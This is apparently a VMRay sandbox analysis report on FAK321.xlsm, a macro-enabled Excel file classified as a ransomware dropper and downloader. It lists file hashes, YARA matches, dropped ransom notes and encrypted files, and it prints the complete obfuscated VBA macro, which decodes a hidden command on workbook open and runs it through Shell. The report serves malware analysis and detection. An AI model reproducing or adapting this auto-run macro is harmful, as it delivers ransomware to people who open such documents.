ca8d10f5...09c0 | Files
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification:
Ransomware
Dropper
Downloader
Threat Names:
Mal/Generic-S

FAK321.xlsm

Excel Document

Created at 2020-02-26T17:40:00

...
Filters:
Filename Category Type Severity Actions
C:\Users\aETAdzjz\Desktop\FAK321.xlsm Sample File Office File
Malicious
...
»
Mime Type application/vnd.ms-excel.sheet.macroEnabled.12
File Size 219.38 KB
MD5 0d75a4dc22c7eb907855bad039f2775b Copy to Clipboard
SHA1 a3d208cbee255b0971551a47e79c66e8cf3f2e63 Copy to Clipboard
SHA256 ca8d10f5e5716b831e5c5bf97e0d3db14b03bea23f1b71c4dc04e68b675309c0 Copy to Clipboard
SSDeep 3072:zn+/iBSjSk+L+kJoZeEfMFtzfBxvD21a37KvSJ8llIw875GE:bsiBImL9NEfMzfBx72W7KqJtFGE Copy to Clipboard
ImpHash -
Office Information
»
Creator Perform Barcelona
Last Modified By Perform Barcelona
Create Time 2020-02-20 15:47:25+00:00
Modify Time 2020-02-20 15:48:16+00:00
Document Information
»
Application Microsoft Excel
App Version 16.0300
Document Security NONE
Titles Of Parts Sheet1
ScaleCrop False
SharedDoc False
VBA Macros (1)
»
Macro #1: ThisWorkbook
» 
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim bXuMQnkaAwSkTSFHshNdUbChAqnrzTPKrgTAhqIawVJYXLqcevSIJPL As String
Dim zVhgaAtbCgdOmzZuWuHCUnyKpULhDAcAxqpfUfDaCtbrPRYxZWROXhM As String
Dim cFYJjwuVVMvxxDsyiaDzRuJqetwyKexjLdvwqcyVNmBbypmQzLBctrj As String
Dim DQCApUvfMkMGTcRdGcimfshNobfUUcVppPsfIwIVmcJMlDTJCCPULEY As String
Dim KDKLiobfjPrRYklpJTMUYEqbFIrmRhVekqhwTGvBLRZwPmQZQNGBUFA As String
Dim bNiGaxJOCPNhiCKrYtgJceuhTMSVEwTfApajkzUDWCXhBFirbqhdnQt As String
bNiGaxJOCPNhiCKrYtgJceuhTMSVEwTfApajkzUDWCXhBFirbqhdnQt = i("KKLALJSFDSAFASFQWFWQ", (l(l("AP@AAD@GAF@>@S@?AT@RDF@B@P@AE?EO@A@TAB@FASAF@F@A@B@A@G@FAO@@ATD?A?AT@?ADAC@BE?DD?QDQ>G@C@SAE@A@OEADQ@C@SAS@PA>AG@@EEEG@C@SAPDQ@A@FAG@A@E@ED??CAF@>A@ABAODF?GABATDC?P@B@S>GAT@T@?ARACDTDT?E@G@DAG@OAFA>@T>R@C@R@GD@EB@SA>@EA?EQDSEQACAB@?@TABABDC@SAGEBD@@C@?@?DPA>@R@T@BARA@ETA@ASA@EDDEDT@G@TAOE>>E@A@G@ADOD??RAR@A@DA?@TAPABDC>SAB@BDPDADFDS>OADADDP>SA?@QABABA@EEEQ@F@B@?D??T@@AD@O@FER>>ADA?AT@TA@ADA@ASAS@CD@D@?@@B@TAT@O>?@P@B@CAB@E@AEGEA@AAG@EE??T@G@QAQD?EB?O@OADAD@>@FAT@AET?@ASA@EDD@"))))
Shell (bNiGaxJOCPNhiCKrYtgJceuhTMSVEwTfApajkzUDWCXhBFirbqhdnQt)
End Sub
Public Function i(fine As String, job As String) As String
        Dim lonDataPtr As Long
        Dim vbc As String
        Dim intXOrValue1 As Integer
        Dim intXOrValue2 As Integer
        For lonDataPtr = 1 To (Len(job) / 2)
            intXOrValue1 = Val("&H" & (Mid$(job, (2 * lonDataPtr) - 1, 2)))
            intXOrValue2 = Asc(Mid$(fine, ((lonDataPtr Mod Len(fine)) + 1), 1))
            vbc = vbc + Chr(intXOrValue1 Xor intXOrValue2)
        Next lonDataPtr
        i = vbc
    End Function
    Public Function l(ll As String)
    Dim lll As Integer, llll As Integer
    lll = 7
    For llll = 1 To Len(ll)
        Mid(ll, llll, 1) = Chr(Asc(Mid(ll, llll, 1)) - lll)
    Next llll
    l = ll
End Function
YARA Matches (2)
»
Rule Name Rule Description Classification Score Actions
VBA_Execution_Commands VBA macro may execute files or system commands -
3/5
...
VBA_Obfuscation_Long_VarName VBA contains excessively long variable names; possible obfuscation -
2/5
...
C:\Users\aETAdzjz\AppData\Local\Temp\newfile.Exe Downloaded File Binary
Blacklisted
...
»
Parent File analysis.pcap
Mime Type application/vnd.microsoft.portable-executable
File Size 56.50 KB
MD5 0389294561acbb3c9c2bda2455304fdc Copy to Clipboard
SHA1 91a9a7ab040dc610ff081060aa1f32a146809262 Copy to Clipboard
SHA256 d187292551fce9f4751a8fab00b9f33088c7a38b7454825e35390b524ba969bd Copy to Clipboard
SSDeep 1536:Mv/QuIoEs0NIaB0dcLGjWHuRF6BVbWXv:Mv/QOSNmmbuz6BVbWXv Copy to Clipboard
ImpHash -
File Reputation Information
»
Severity
Blacklisted
Names Mal/Generic-S
C:\Users\aETAdzjz\AppData\Local\Temp\tav1geqs.exe Dropped File Binary
Unknown
...
»
Mime Type application/vnd.microsoft.portable-executable
File Size 29.50 KB
MD5 65162d7b00692c6321575e9a305a26a9 Copy to Clipboard
SHA1 493526133607927e023bfa1e48fb27470add1b82 Copy to Clipboard
SHA256 932c4196357e5b557e8849354cbe01520342aa2dff5212559b7f4f9f9a8d7a69 Copy to Clipboard
SSDeep 384:08k9QU5aMNmO2kYIxSWrw5FIH6JHcysrJbw7hiJ6EKJ+iQY:fwaIbxSW89FsJw77nV Copy to Clipboard
ImpHash -
PE Information
»
Image Base 0x140000000
Size Of Code 0x6e00
Size Of Initialized Data 0x600
File Type FileType.executable
Subsystem Subsystem.windows_cui
Machine Type MachineType.amd64
Compile Timestamp 2067-02-07 11:41:53+00:00
Version Information (11)
»
Assembly Version 1.0.0.0
Comments -
CompanyName -
FileDescription SharpExec
FileVersion 1.0.0.0
InternalName SharpExec.exe
LegalCopyright Copyright © 2019
LegalTrademarks -
OriginalFilename SharpExec.exe
ProductName SharpExec
ProductVersion 1.0.0.0
Sections (2)
»
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x140002000 0x6d52 0x6e00 0x200 IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 5.29
.rsrc 0x14000a000 0x5ac 0x600 0x7000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 4.08
C:\Users\aETAdzjz\Music\1fTEy\if5to0jxN\HELP_ME_RECOVER_MY_FILES.txt Dropped File Text
Unknown
...
»
Also Known As C:\Users\aETAdzjz\Desktop\DG2Yxk0zg72dqS\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\Music\1fTEy\7W6HQAMkHdbzSf\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\Videos\GVs APi\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\AppData\Local\Temp\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\Music\3Jl74ROONucJ80fF9hA\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\AppData\Local\Microsoft\OneDrive\17.3.6998.0830\images\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\Documents\jdBvBc6u\F_E7YCrl80MpoD5\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\Pictures\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\Videos\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\AppData\Local\Microsoft\OneDrive\17.3.6998.0830\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\Music\1fTEy\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\Documents\F xCbMG2hYCWHb\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\Music\1fTEy\XNYyUcVYPLap0\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\Music\1fTEy\fJN0SGmqcIg3hbyrC1f\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\Public\Pictures\Sample Pictures\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\Music\1fTEy\fJN0SGmqcIg3hbyrC1f\M6SwHuuThZ2xxd8ocvI\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\Pictures\owuAyhfH\vypO\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.0.0.6_0\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\Documents\jdBvBc6u\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\Desktop\DG2Yxk0zg72dqS\aVfHDIy-j1As5C\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\Documents\jdBvBc6u\5sYGtdS7JSPQo7Hb\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\AppData\Roaming\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\Public\Music\Sample Music\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\Music\pHE9cC\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\Documents\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\Pictures\owuAyhfH\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\Music\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\Music\1fTEy\EFTL7 0kDWKrzX\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\AppData\LocalLow\Adobe\Acrobat\10.0\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\Documents\jdBvBc6u\i gRo1Qs_aUfCFhUTW3\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\AppData\Local\Microsoft\Media Player\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\Documents\Outlook Files\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\AppData\Local\Mozilla\Firefox\Profiles\3y2joh8o.default\thumbnails\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
C:\Users\aETAdzjz\Desktop\HELP_ME_RECOVER_MY_FILES.txt (Dropped File)
Mime Type text/plain
File Size 1.36 KB
MD5 1d8ee2d2c12bee340321da7b6aa78e91 Copy to Clipboard
SHA1 afbf57370a1811d55d9db9e0c337077199cac7a7 Copy to Clipboard
SHA256 62443430bdc701d7e9769c8835127bb557c279909d27fe914b7a77615f8b71e7 Copy to Clipboard
SSDeep 24:YgaUoum3eCYvWn9aO88cfZwuoouierThMP1ZFkK8eZ8Q6nb6T3:Yga0tWn9aLtZwugTqP1181b+ Copy to Clipboard
ImpHash -
c:\users\aetadzjz\appdata\local\temp\wallpaper.bmp Dropped File Image
Unknown
...
»
Mime Type image/x-ms-bmp
File Size 342.87 KB
MD5 3cec8ffd4d68def51a03cae5c5e0ba67 Copy to Clipboard
SHA1 46c74602ce6a3e500fd7f331344467b792d82f5f Copy to Clipboard
SHA256 7ecc5d84d656a925403fe4c25fd8b734201eff0a073723ea08cbd5857d48b5a3 Copy to Clipboard
SSDeep 384:nM6JCYq6XUG6VgWgRbbdL+hL/hoT9UcqnXX3nfkWDsPNZDW1ktqu71:MblVgWgRlbUccX3nfkWDsP7iCtqu7 Copy to Clipboard
ImpHash -
C:\Users\aETAdzjz\AppData\Local\Microsoft\OneDrive\17.3.6998.0830\ThirdPartyNotices.txt.crypted Dropped File Stream
Unknown
...
»
Mime Type application/octet-stream
File Size 47.98 KB
MD5 d541ce5063681475d5a46c7dc5d39fd9 Copy to Clipboard
SHA1 d153497359761a4c3b7175e7b387e53db0c8c347 Copy to Clipboard
SHA256 64d376abc3400d9fb2fa298981fbaf92182542f744e47e76a3fec8e3c441b44c Copy to Clipboard
SSDeep 768:ZeOydnZ4UpwsjJF+G3FEM8ZuWaPRyXa7tr5mex6I9Lsc6fTDGenq2zvCb1SJ9kIW:ZeOydnfpVjJF+G3FWKB7jmJjnGeNzv/W Copy to Clipboard
ImpHash -
c:\users\aetadzjz\appdata\local\microsoft\onedrive\17.3.6998.0830\images\checkmark_in_progress.svg.crypted Dropped File Stream
Unknown
...
»
Mime Type application/octet-stream
File Size 400 Bytes
MD5 7e84e79d30d4cadc20a0712122cd5077 Copy to Clipboard
SHA1 dee6251997de1264c69cf0b899e17543f77b9aa9 Copy to Clipboard
SHA256 c36eb4e4e409fb92c28cb3795b24c14946696bdb9ce5e97f35d23cce20221b1c Copy to Clipboard
SSDeep 6:ClF6zMrXoy238vuFxYmNbDPcQGXDEkRSWHFNrUoZxAAhYM8nN7kU9jttlp2n:3zM1pmL1Ey3WlNrDZGkYBN7NQ Copy to Clipboard
ImpHash -
732652f7eb4d18a5e406b441ae176600b14f13d70b373efbaa2815d29ef5351e Downloaded File Image
Unknown
...
»
Parent File analysis.pcap
Mime Type image/x-ms-bmp
File Size 342.87 KB
MD5 a88a9cf67fcbf53ec55ad59952240dff Copy to Clipboard
SHA1 942f26d1a9033f9f3cd1b0a0dbde3efcfc70f60f Copy to Clipboard
SHA256 732652f7eb4d18a5e406b441ae176600b14f13d70b373efbaa2815d29ef5351e Copy to Clipboard
SSDeep 384:TM6JCYq6XUG6VgWgRbbdL+hL/hoT9UcqnXX3nfkWDsPNZDW1ktqu71:4blVgWgRlbUccX3nfkWDsP7iCtqu7 Copy to Clipboard
ImpHash -
sheet1.xml Embedded File Text
Unknown
...
»
Parent File C:\Users\aETAdzjz\Desktop\FAK321.xlsm
Mime Type text/xml
File Size 697 Bytes
MD5 cb073df9d8d7ec3850770496b3ebcf70 Copy to Clipboard
SHA1 92ea982bf793197948db4c6f5a72093cb1362f6c Copy to Clipboard
SHA256 393fb065fcc52d25e702b795acf6275aa0533ba8301e4950fca82bb41a9de76c Copy to Clipboard
SSDeep 12:TMHdtl46fxhmflbEOEfWKvA1EI+DYQBsOD3O7xVIOoGadWzslXy1y:2dti6fxhmflYZf8P+Kw3O7x6O2dksEk Copy to Clipboard
ImpHash -
workbook.xml Embedded File Text
Unknown
...
»
Parent File C:\Users\aETAdzjz\Desktop\FAK321.xlsm
Mime Type text/xml
File Size 1.21 KB
MD5 784285a16c36dc48a7910efd9b728fd7 Copy to Clipboard
SHA1 1befbc5d109c6625e1945c101e5cf3b3f3e8af69 Copy to Clipboard
SHA256 6125814bafb2c22ec4eaa0d019d99966991979c89bf2019ca7ebff4715674b54 Copy to Clipboard
SSDeep 24:2dt06fxhmflYZf8qC+B22n19EfLoyDE+BSxVJrzNNtC+B2U6Zt:cV5hmNYZt1B7YMyTBmVJrzNNt1BIX Copy to Clipboard
ImpHash -
vbaProject.bin Embedded File OLE Compound
Unknown
...
»
Parent File C:\Users\aETAdzjz\Desktop\FAK321.xlsm
Mime Type application/CDFV2
File Size 15.00 KB
MD5 ca7bc00dbe796fc1011947821044feee Copy to Clipboard
SHA1 7fbdae7bd0877813552958b818f48b80b4c7ca21 Copy to Clipboard
SHA256 e103c31f5b0ceedd4f79b0cf5889567cb20e20ede00421c11f92400ded4b93f9 Copy to Clipboard
SSDeep 192:C8x+qY2T9R6nWp3mZm7YtNXRMyTtS+VAMVaf:CnqxxKWRmZm7URMyTtPh Copy to Clipboard
ImpHash -
Exit-Icon
WHOIS Domain Information
Domain Name
WHOIS Response 

       		
      

     

    

   

  

  

  

  

   

    
    

     Function Logfile
    

    

     

      Download-Icon
     

    

    

     Exit-Icon
    

   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image